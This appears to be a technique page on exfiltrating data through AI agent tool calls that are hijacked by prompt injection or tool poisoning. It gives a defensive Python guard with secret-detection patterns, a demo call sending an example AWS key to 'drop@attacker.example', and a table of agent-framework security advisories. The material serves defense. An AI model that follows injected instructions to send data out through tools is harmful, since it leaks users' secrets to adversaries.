Exfiltration via AI Agent Tool Invocation
AI agent tools that perform write operations (send, create, update, upload) can be turned into an exfiltration channel. An adversary places sensitive information in the tool's input parameters, and the tool transmits it to an adversary-controlled location (an inbox, a shared document, a CRM record, or a server) as part of what looks like a legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or generating media such as images or videos with the data embedded in them. The invoked tool may itself be legitimate and merely invoked by the adversary via [LLM Prompt Injection](/techniques/AML.T0051), or the tool may be malicious (see [AI Agent Tool Poisoning](/techniques/AML.T0110)). AI Agent Tool Poisoning can also be used to manipulate the inputs and destination of a separate, legitimate tool that the victim invokes through normal usage. Because the exfiltrating call is a normal use of the tool, the resulting traffic is ordinary traffic from an approved integration; the point of visibility is the invocation itself: which tool was called, what destination its arguments name, and whether those arguments carry data the agent's task did not require.
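The following is an added example, not ATLAS's nor any agent framework's own code: a Python policy check that an agent runtime can apply to each write-capable tool call before executing it. It denies calls whose destination argument names a host outside an allowlist, and calls whose arguments carry secret-shaped data, including data hidden in base64. The tool names, argument names, allowlist, secret patterns and sample calls are all hypothetical and constructed for the demo.

```python
"""Added example (not from ATLAS or any framework): a policy check applied to an
agent's tool call before it executes. Tool names, argument names, the allowlist
and the secret patterns below are hypothetical and chosen for the demo."""
import base64
import re
from dataclasses import dataclass, field

# Hypothetical policy: tools that write data outward, the argument(s) naming
# the destination, and the destination domains the deployment approves.
WRITE_TOOLS = {
    "send_email": {"dest_args": ("to", "cc", "bcc"), "allowed": {"corp.example"}},
    "http_post":  {"dest_args": ("url",),            "allowed": {"api.corp.example"}},
    "update_crm": {"dest_args": (),                  "allowed": set()},
}

# Data that should never leave through a tool argument (constructed for the demo).
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key":    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "ssn":            re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}
# Long base64-looking runs: the usual way injected data is hidden in a "normal" field.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


@dataclass
class Verdict:
    allowed: bool
    reasons: list = field(default_factory=list)


def _destination_host(value: str) -> str:
    """Host part of an e-mail address (also 'Name <user@host>') or URL, for allowlist matching."""
    if "@" in value and "://" not in value:
        return value.rsplit("@", 1)[1].rstrip("> ").lower()
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", value, re.I)
    return m.group(1).lower() if m else value.lower()


def _host_allowed(host: str, allowed: set) -> bool:
    return any(host == a or host.endswith("." + a) for a in allowed)


def _strings(value):
    """Yield every string inside a nested argument structure (dicts, lists, scalars)."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, (list, tuple)):
        for v in value:
            yield from _strings(v)


def _scan_for_secrets(text: str, reasons: list, label: str) -> None:
    for name, pat in SECRET_PATTERNS.items():
        if pat.search(text):
            reasons.append(f"{label}: contains {name}")
    # Decode candidate base64 blobs once and rescan; padding is repaired, garbage is ignored.
    for blob in B64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "ignore")
        except ValueError:          # binascii.Error is a ValueError
            continue
        for name, pat in SECRET_PATTERNS.items():
            if pat.search(decoded):
                reasons.append(f"{label}: base64-encoded {name}")


def check_tool_call(call: dict) -> Verdict:
    """Allow or deny one tool call of the form {"name": ..., "arguments": {...}}."""
    name, args = call.get("name"), call.get("arguments", {})
    policy = WRITE_TOOLS.get(name)
    if policy is None:
        return Verdict(True)            # read-only or unknown tools are outside this guard
    reasons: list = []
    for arg in policy["dest_args"]:     # 1. every destination must be on the allowlist
        for dest in _strings(args.get(arg, ())):
            host = _destination_host(dest)
            if not _host_allowed(host, policy["allowed"]):
                reasons.append(f"{arg}: destination {host} not in allowlist")
    for text in _strings(args):         # 2. no argument may carry sensitive data, plain or encoded
        _scan_for_secrets(text, reasons, name)
    return Verdict(not reasons, reasons)


def demo_calls() -> dict:
    """Constructed sample calls: benign, prompt-injected, and with an encoded payload."""
    hidden = base64.b64encode(b"customer record: ssn 123-45-6789, dob 1980-01-01").decode()
    return {
        "benign":   {"name": "send_email", "arguments": {"to": "alice@corp.example",
                                                          "subject": "Q3 summary", "body": "Numbers attached."}},
        "injected": {"name": "send_email", "arguments": {"to": ["alice@corp.example", "drop@attacker.example"],
                                                          "body": "fyi, key is AKIAIOSFODNN7EXAMPLE"}},
        "encoded":  {"name": "http_post", "arguments": {"url": "https://api.corp.example/upload",
                                                         "body": hidden}},
    }


if __name__ == "__main__":
    for label, call in demo_calls().items():
        v = check_tool_call(call)
        print(f"{label:9s} allowed={v.allowed} {v.reasons}")
```

Two limitations are worth stating. The guard only inspects tools it has been told are write-capable, so a call to an unlisted tool passes untouched, and pattern matching catches secret-shaped data, not arbitrary sensitive content. What it does give you is a decision point at the invocation, which is where this technique is visible; the request the tool then makes is ordinary traffic from an approved integration.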
| Severity | Advisory | Headline | Package | CVSS |
|---|---|---|---|---|
| CRITICAL | CVE-2025-2828 | LangChain RequestsToolkit: SSRF exposes cloud metadata | langchain | 10.0 |
| CRITICAL | CVE-2026-25053 | n8n: Command Injection enables RCE | n8n | 9.9 |
| CRITICAL | CVE-2025-61913 | Flowise: path traversal in file tools leads to RCE | flowise | 9.9 |
| CRITICAL | CVE-2026-25592 | semantic-kernel: Path Traversal enables file access | semantic-kernel | 9.9 |
| CRITICAL | CVE-2025-46059 | LangChain GmailToolkit: indirect prompt injection to RCE | — | 9.8 |
| CRITICAL | CVE-2026-2654 | smolagents: SSRF allows internal network access | smolagents | 9.8 |
| CRITICAL | CVE-2024-7042 | LangChainJS: prompt injection enables full graph DB takeover | langchain | 9.8 |
| CRITICAL | CVE-2026-25130 | cai-framework: Command Injection enables RCE | — | 9.7 |
| CRITICAL | GHSA-2763-cj5r-c79m | PraisonAI: RCE via shell injection in agent workflows | PraisonAI | 9.7 |
| CRITICAL | CVE-2026-28451 | OpenClaw: SSRF via Feishu extension exposes internal services | openclaw | 9.3 |
| CRITICAL | CVE-2026-27825 | mcp-atlassian: Path Traversal enables file access | mcp-atlassian | 9.1 |
| CRITICAL | GHSA-8x8f-54wf-vv92 | PraisonAI: auth bypass enables browser session hijack | PraisonAI | 9.1 |
| HIGH | GHSA-qwgj-rrpj-75xm | PraisonAI: hardcoded approval bypass enables RCE | PraisonAI | 8.8 |
| HIGH | CVE-2026-27498 | n8n: Code Injection enables RCE | n8n | 8.8 |
| HIGH | GHSA-cwj3-vqpp-pmxr | openclaw: Model bypasses authz to persist unsafe config | openclaw | 8.8 |
| HIGH | CVE-2025-66404 | mcp-server-kubernetes: Command Injection enables RCE | — | 8.8 |
| HIGH | CVE-2026-44552 | open-webui: Redis cache poisoning enables cross-instance tool hijack | open-webui | 8.7 |
| HIGH | GHSA-gqqj-85qm-8qhf | paperclipai: connector trust bypass enables Gmail read/write | paperclipai | 8.7 |
| HIGH | CVE-2026-34954 | praisonaiagents: SSRF leaks cloud IAM credentials | praisonaiagents | 8.6 |
| HIGH | GHSA-4ggg-h7ph-26qr | n8n-mcp: authenticated SSRF leaks cloud metadata | n8n-mcp | 8.5 |
| HIGH | CVE-2026-42449 | n8n-mcp: SSRF bypass via IPv6 leaks API keys | n8n-mcp | 8.5 |
| HIGH | CVE-2026-39974 | n8n-MCP: SSRF exposes cloud metadata via MCP headers | — | 8.5 |
| HIGH | CVE-2026-35394 | mobile-mcp: intent injection enables device control via AI agent | — | 8.3 |
| HIGH | GHSA-8g7g-hmwm-6rv2 | n8n-mcp: path traversal + SSRF exposes n8n API keys | n8n-mcp | 8.3 |
| HIGH | CVE-2026-33989 | @mobilenext/mobile-mcp: path traversal via AI agent tool | — | 8.1 |
| HIGH | GHSA-x462-jjpc-q4q4 | praisonaiagents: CORS bypass enables silent agent RCE | praisonaiagents | 8.1 |
| HIGH | CVE-2026-40150 | PraisonAIAgents: SSRF exposes cloud metadata via web_crawl | praisonaiagents | 7.7 |
| HIGH | CVE-2026-26321 | OpenClaw: path traversal enables local file exfiltration | openclaw | 7.5 |
| HIGH | CVE-2026-40153 | praisonaiagents: env var expansion exposes production secrets | praisonaiagents | 7.4 |
| HIGH | GHSA-w8hx-hqjv-vjcq | Paperclip: RCE via workspace runtime command injection | @paperclipai/server | 7.3 |
| HIGH | CVE-2026-40114 | PraisonAI: unauthenticated SSRF via unvalidated webhook_url | PraisonAI | 7.2 |
| MEDIUM | CVE-2026-43901 | wireshark-mcp: path traversal enables arbitrary file write via MCP | — | 6.8 |
| MEDIUM | CVE-2026-25631 | n8n: Input Validation flaw enables exploitation | n8n | 6.5 |
| MEDIUM | CVE-2026-25475 | OpenClaw: path traversal enables arbitrary file read | openclaw | 6.5 |
| MEDIUM | CVE-2026-40117 | PraisonAI: arbitrary file read via unguarded skill tool | praisonaiagents | 6.2 |
| MEDIUM | CVE-2026-6011 | OpenClaw: SSRF via web-fetch enables internal network pivot | openclaw | 5.6 |
| MEDIUM | GHSA-ffp3-3562-8cv3 | PraisonAI: tool approval bypass leaks env credentials | praisonaiagents | 5.5 |
| MEDIUM | CVE-2025-68697 | n8n: security flaw enables exploitation | n8n | 5.4 |
| MEDIUM | CVE-2026-27795 | LangChain: SSRF allows internal network access | — | 4.1 |
| HIGH | GHSA-mr34-9552-qr95 | openclaw: path traversal leaks files and NTLM credentials | openclaw | — |
| UNKNOWN | CVE-2025-34072 | Slack MCP: zero-click exfiltration via link unfurling | — | — |
| UNKNOWN | CVE-2026-2286 | CrewAI: SSRF via unvalidated RAG tool URLs exposes internal services | — | — |
| UNKNOWN | CVE-2026-2285 | CrewAI: arbitrary file read via JSON loader tool | — | — |
| MEDIUM | CVE-2026-34451 | anthropic-ai/sdk: memory tool path traversal escape | @anthropic-ai/sdk | — |
| CRITICAL | CVE-2026-35615 | PraisonAI: path traversal exposes full filesystem via agent tools | PraisonAI | — |
| MEDIUM | GHSA-846p-hgpv-vphc | OpenClaw: path traversal → host file exfiltration via QQ Bot | openclaw | — |
| HIGH | GHSA-qx8j-g322-qj6m | OpenClaw: unsafe body replay on cross-origin redirect | openclaw | — |
| MEDIUM | GHSA-w8g9-x8gx-crmm | OpenClaw: SSRF bypass via Playwright redirect handling | openclaw | — |
| LOW | GHSA-5fc7-f62m-8983 | OpenClaw: local file read bypasses workspace policy | openclaw | — |
| MEDIUM | GHSA-3fv3-6p2v-gxwj | openclaw: SSRF bypass in QQ Bot media fetch paths | openclaw | — |
| MEDIUM | GHSA-vr5g-mmx7-h897 | OpenClaw: SSRF bypass via interaction-triggered navigation | openclaw | — |
| MEDIUM | GHSA-qqq7-4hxc-x63c | openclaw: local file exfiltration via trusted MEDIA refs | openclaw | — |
| HIGH | CVE-2026-40160 | praisonaiagents: SSRF in web_crawl exposes cloud metadata | praisonaiagents | — |
| HIGH | GHSA-28g4-38q8-3cwc | Flowise: Cypher injection allows full Neo4j DB wipe | flowise-components | — |
| MEDIUM | GHSA-qqvm-66q4-vf5c | Flowise: SSRF bypass enables cloud credential theft | flowise-components | — |
| UNKNOWN | CVE-2026-44694 | n8n-MCP: SSRF allows internal network access via webhook tools | n8n-mcp | — |
| HIGH | CVE-2026-44335 | praisonaiagents: SSRF via URL parser confusion bypass | praisonaiagents | — |
| LOW | CVE-2026-44220 | ciguard: symlink traversal exposes secrets via MCP agent | — | — |
| MEDIUM | GHSA-55cf-xx38-4p9p | OpenClaw: .env injection redirects connector endpoints | openclaw | — |
| MEDIUM | GHSA-gfg9-5357-hv4c | openclaw: path traversal exposes host files via audio embed | openclaw | — |
| UNKNOWN | CVE-2026-42226 | n8n: IDOR exposes cross-user API key exfiltration | n8n | — |
| UNKNOWN | CVE-2026-42233 | n8n: SQL injection in Oracle node allows data exfiltration | n8n | — |
| UNKNOWN | CVE-2026-42237 | n8n: SQL injection in Snowflake/MySQL nodes bypasses fix | n8n | — |
| LOW | GHSA-c4qg-j8jg-42q5 | openclaw: SSRF in QQBot media upload bypasses validation | openclaw | — |
| UNKNOWN | CVE-2026-41274 | Flowise: Cypher injection via GraphCypherQAChain node | flowise | — |